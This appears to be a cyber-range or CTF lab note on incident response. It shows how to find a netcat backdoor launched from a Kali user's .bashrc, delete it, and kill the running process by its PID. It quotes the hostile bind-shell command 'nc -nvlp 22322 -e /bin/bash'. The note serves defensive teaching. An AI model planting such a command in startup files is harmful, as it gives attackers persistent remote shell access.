truelyyours/RTFD/OWASP Top 10 Cyber Range/5 - CySA + CTF.md

 The '_nc -nvlp 22322 -e /bin/bash'_ command seems to be executed by the .bashrc file which is a script that gets executed each time a bash session is started.
 To confirm this, go to _.bashrc_ and read the file.
 Remove the backdoor by locating the _nc_ command and deleting it.

 Where is the .bashrc file located? `/home/kali/.bashrc`
+# Terminating the attacker's persistent connection

+Be cautious!
+Even after deleting the backdoor command from the _/home/kali/.bashrc_ file, the process will still run, so kill the process using the kill command.
+This command allows for process termination based on the process ID.
+The netstat command executed in the previous step showed the process _ID (PID)_ of the netcat backdoor.
+Use that ID to terminate the backdoor connection.
+`kill ID

+Check if the process has been killed by using sudo netstat -tulpn:
+`netstat -tulpn